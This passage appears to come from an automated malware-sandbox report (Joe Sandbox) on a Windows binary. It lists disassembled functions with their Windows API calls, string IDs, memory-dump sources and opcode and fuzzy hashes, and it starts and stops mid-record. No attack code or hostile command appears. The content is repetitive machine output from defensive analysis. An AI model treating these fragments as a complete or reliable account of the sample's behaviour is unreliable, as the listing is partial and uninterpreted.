                                                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                      • String ID: 0$F
                                                                                                                      • API String ID: 176399719-3044882817
                                                                                                                      • Opcode ID: 85d09ce0a7186b3e0cd6995f3e162c85d558156775d95a706c430e57338e9cc1
                                                                                                                      • Instruction ID: 8c4da982c4093a0c2100d166c4c67d63aae7b1b796905987d308896116a44ad3
                                                                                                                      • Opcode Fuzzy Hash: 85d09ce0a7186b3e0cd6995f3e162c85d558156775d95a706c430e57338e9cc1
                                                                                                                      • Instruction Fuzzy Hash: 1C417578A05209EFDB20DFA8D988EDABBB5FF09304F140529F905A7361D771A914DF90
                                                                                                                      Function 005474BB Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0054755E
                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00547565
                                                                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00547578
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00547580
                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0054758B
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 00547594
                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0054759E
                                                                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 005475B2
                                                                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 005475BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                      • String ID: static
                                                                                                                      • API String ID: 2559357485-2160076837
                                                                                                                      • Opcode ID: 61aac56f1ddfc6c39cfe408ffdf8af0086a1509b86222e373c1ebaaf7d6e4155
                                                                                                                      • Instruction ID: f301ba639580bd464652acb3f1da74a0881569b72c3be1f0d6421ec118ca7701
                                                                                                                      • Opcode Fuzzy Hash: 61aac56f1ddfc6c39cfe408ffdf8af0086a1509b86222e373c1ebaaf7d6e4155
                                                                                                                      • Instruction Fuzzy Hash: C3315A36105219AFDF119F68DC08FEA3F69FF1E368F110224FA15A60A0D735D815EBA4
                                                                                                                      Function 004E6E03 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004E6E3E
                                                                                                                        • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
                                                                                                                      • __gmtime64_s.LIBCMT ref: 004E6ED7
                                                                                                                      • __gmtime64_s.LIBCMT ref: 004E6F0D
                                                                                                                      • __gmtime64_s.LIBCMT ref: 004E6F2A
                                                                                                                      • __allrem.LIBCMT ref: 004E6F80
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E6F9C
                                                                                                                      • __allrem.LIBCMT ref: 004E6FB3
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E6FD1
                                                                                                                      • __allrem.LIBCMT ref: 004E6FE8
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004E7006
                                                                                                                      • __invoke_watson.LIBCMT ref: 004E7077
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 384356119-0
                                                                                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                      • Instruction ID: 7f543ae69b44f3b8ff4cb60bb228cac1d8aa81e77299eec86d53940239cb4703
                                                                                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                                                                      • Instruction Fuzzy Hash: 52710772A00756ABD714AF6FDC41B6BB3A8AF14369F10422FF614E62C1E778D9008798
                                                                                                                      Function 00522527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00522542
                                                                                                                      • GetMenuItemInfoW.USER32(00585890,000000FF,00000000,00000030), ref: 005225A3
                                                                                                                      • SetMenuItemInfoW.USER32(00585890,00000004,00000000,00000030), ref: 005225D9
                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 005225EB
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 0052262F
                                                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0052264B
                                                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00522675
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 005226BA
                                                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00522700
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00522714
                                                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00522735
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4176008265-0
                                                                                                                      • Opcode ID: 21b08efb317ddc94a8537ded6c548bcbb9ff31b577f5022ec36b3de5bc9f8754
                                                                                                                      • Instruction ID: 8a5dbb12ee55e3931f6eeecd2b7e00c7045d8416ca40f38af66dbb1c271714a0
                                                                                                                      • Opcode Fuzzy Hash: 21b08efb317ddc94a8537ded6c548bcbb9ff31b577f5022ec36b3de5bc9f8754
                                                                                                                      • Instruction Fuzzy Hash: 06618D79904259BFDB11CF64E888DEE7FB8FF42308F584459E842A7290DB31AD09DB21
                                                                                                                      Function 00546F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00546FA5
                                                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00546FA8
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00546FCC
                                                                                                                      • _memset.LIBCMT ref: 00546FDD
                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00546FEF
                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00547067
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$LongWindow_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 830647256-0
                                                                                                                      • Opcode ID: 1d57d7d974cb5c6103da5429689a8b9d8720ca3dbe5d126f511bc7cd861b08d8
                                                                                                                      • Instruction ID: f6e8b5b10a19896ce2b4926875ba16e6ace82b4511e47f0a838c60f190056332
                                                                                                                      • Opcode Fuzzy Hash: 1d57d7d974cb5c6103da5429689a8b9d8720ca3dbe5d126f511bc7cd861b08d8
                                                                                                                      • Instruction Fuzzy Hash: 23616875900208AFDB10DFA4CC85EEE7BB8FB09714F10419AFA14AB2A1D771AD45DFA0
                                                                                                                      Function 00516B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00516BBF
                                                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00516C18
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00516C2A
                                                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00516C4A
                                                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00516C9D
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00516CB1
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00516CC6
                                                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00516CD3
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00516CDC
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00516CEE
                                                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00516CF9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2706829360-0
                                                                                                                      • Opcode ID: 6eeedebd88428932c6074a8d151a232b35e075e29669bbff6c545c77f7d96674
                                                                                                                      • Instruction ID: b2181b4f272b3dc8589e527856af13362f5122b6b961a743af0a5618ea9ba703
                                                                                                                      • Opcode Fuzzy Hash: 6eeedebd88428932c6074a8d151a232b35e075e29669bbff6c545c77f7d96674
                                                                                                                      • Instruction Fuzzy Hash: 62417035A0011AAFDF00DF68D8489EEBFB9FF58358F008069E955A7261CB34AD49DB90
                                                                                                                      Function 005383BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C9837: __itow.LIBCMT ref: 004C9862
                                                                                                                        • Part of subcall function 004C9837: __swprintf.LIBCMT ref: 004C98AC
                                                                                                                      • CoInitialize.OLE32 ref: 00538403
                                                                                                                      • CoUninitialize.OLE32 ref: 0053840E
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00552BEC,?), ref: 0053846E
                                                                                                                      • IIDFromString.OLE32(?,?), ref: 005384E1
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0053857B
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 005385DC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                      • API String ID: 834269672-1287834457
                                                                                                                      • Opcode ID: 9b3ed89e4138f10cc3b8717d26549ab7c0b23063253e3d7aee9cbd2eff17353d
                                                                                                                      • Instruction ID: 9ac6a78852f937ce0530c891e8a1d3f62591ea612f0a5378a200840d0453cc88
                                                                                                                      • Opcode Fuzzy Hash: 9b3ed89e4138f10cc3b8717d26549ab7c0b23063253e3d7aee9cbd2eff17353d
                                                                                                                      • Instruction Fuzzy Hash: 1261B070608312AFDB14DF54D848F6ABBE8BF49758F04481DF9859B291DB70ED48CB92
                                                                                                                      Function 00535732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00535793
                                                                                                                      • inet_addr.WSOCK32(?), ref: 005357D8
                                                                                                                      • gethostbyname.WSOCK32(?), ref: 005357E4
                                                                                                                      • IcmpCreateFile.IPHLPAPI ref: 005357F2
                                                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00535862
                                                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00535878
                                                                                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 005358ED
                                                                                                                      • WSACleanup.WSOCK32 ref: 005358F3
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                      • String ID: Ping
                                                                                                                      • API String ID: 1028309954-2246546115
                                                                                                                      • Opcode ID: 5df4bcb72358ac241cb6036225726a9e0c7d0b0c03b46142483f90941014e684
                                                                                                                      • Instruction ID: d1a5965b0762205f8516096f87114bd50f9aa68a6ef428649a03ab09ce859443
                                                                                                                      • Opcode Fuzzy Hash: 5df4bcb72358ac241cb6036225726a9e0c7d0b0c03b46142483f90941014e684
                                                                                                                      • Instruction Fuzzy Hash: 4F519C35600600AFDB10AF25DC49B6ABBE4FF48724F14592EF996DB2A1EB34EC44DB41
                                                                                                                      Function 0052B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0052B4D0
                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0052B546
                                                                                                                      • GetLastError.KERNEL32 ref: 0052B550
                                                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0052B5BD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                      • Opcode ID: 840a2148c33bded7339b654816bbc4a22a854cf775ab3abccbff8cba4ca7f819
                                                                                                                      • Instruction ID: 5de6eb28a330fe368b7646448740b5f1a816018287b473505fee1f59e5414cd6
                                                                                                                      • Opcode Fuzzy Hash: 840a2148c33bded7339b654816bbc4a22a854cf775ab3abccbff8cba4ca7f819
                                                                                                                      • Instruction Fuzzy Hash: 8C31C239B00215EFEB00DB68E889EBE7FB4FF46304F14806AE5059B2D1EB709A45DB51
                                                                                                                      Function 00518F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00519014
                                                                                                                      • GetDlgCtrlID.USER32 ref: 0051901F
                                                                                                                      • GetParent.USER32 ref: 0051903B
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0051903E
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00519047
                                                                                                                      • GetParent.USER32(?), ref: 00519063
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00519066
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: 71bec3cd1839592b5fbe5a3c4c86ad0656a5b4d6bffb039a612038862335361e
                                                                                                                      • Instruction ID: 7e692f0f1d91334ca26702f94825b29f030d7c5b628839f1b7863c1e3c14a018
                                                                                                                      • Opcode Fuzzy Hash: 71bec3cd1839592b5fbe5a3c4c86ad0656a5b4d6bffb039a612038862335361e
                                                                                                                      • Instruction Fuzzy Hash: 8D212878A00108BBDF05EBA4DC99EFEBB74FF59310F00011AF961972A1DB755859EB20
                                                                                                                      Function 0051907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C7DE1: _memmove.LIBCMT ref: 004C7E22
                                                                                                                        • Part of subcall function 0051AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0051AABC
                                                                                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 005190FD
                                                                                                                      • GetDlgCtrlID.USER32 ref: 00519108
                                                                                                                      • GetParent.USER32 ref: 00519124
                                                                                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00519127
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 00519130
                                                                                                                      • GetParent.USER32(?), ref: 0051914C
                                                                                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0051914F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 1536045017-1403004172
                                                                                                                      • Opcode ID: 11c16c6c3f9da19e59eb8c9a575d64542bce37c1d39d9297f8032cf6ea50fe39
                                                                                                                      • Instruction ID: 463af151cbd9ff03cd024e308ecf9361c32f79069b7366123ffbb1696ff27fe0
                                                                                                                      • Opcode Fuzzy Hash: 11c16c6c3f9da19e59eb8c9a575d64542bce37c1d39d9297f8032cf6ea50fe39
                                                                                                                      • Instruction Fuzzy Hash: 3621F878A01109BBEF01ABA5DC89EFEBB74FF59300F00401AF911972A1DB755499EB20
                                                                                                                      Function 00519163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetParent.USER32 ref: 0051916F
                                                                                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00519184
                                                                                                                      • _wcscmp.LIBCMT ref: 00519196
                                                                                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00519211
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                                                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                      • API String ID: 1704125052-3381328864
                                                                                                                      • Opcode ID: 2ba694b24d9c5c462cf59fa5af42dd30fee580c4403d86c3a33fa8cf8f39127f
                                                                                                                      • Instruction ID: 5459b8c681be40f897b0e74c5330c29853aa3586560469b84d9ed6a2da446b6c
                                                                                                                      • Opcode Fuzzy Hash: 2ba694b24d9c5c462cf59fa5af42dd30fee580c4403d86c3a33fa8cf8f39127f
                                                                                                                      • Instruction Fuzzy Hash: CF11503E18831779FA112629FC1ADE73F9CFB15724B200027FA14A10D1FEB558916654
                                                                                                                      Function 00527990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00527A6C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1725837607-0
                                                                                                                      • Opcode ID: 510e4391d68fcb0bb2612d9c24a4db20915871be373137726dc203ef47346b29
                                                                                                                      • Instruction ID: aefd558a2cdd191b75b76da40022f54f56193356063023e49aa90ce5a00bdc28
                                                                                                                      • Opcode Fuzzy Hash: 510e4391d68fcb0bb2612d9c24a4db20915871be373137726dc203ef47346b29
                                                                                                                      • Instruction Fuzzy Hash: C2B17C7590822A9FDB00DFA5E885BBEBBB4FF4A325F204429E511E7281D734AD41CB90
                                                                                                                      Function 004CFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
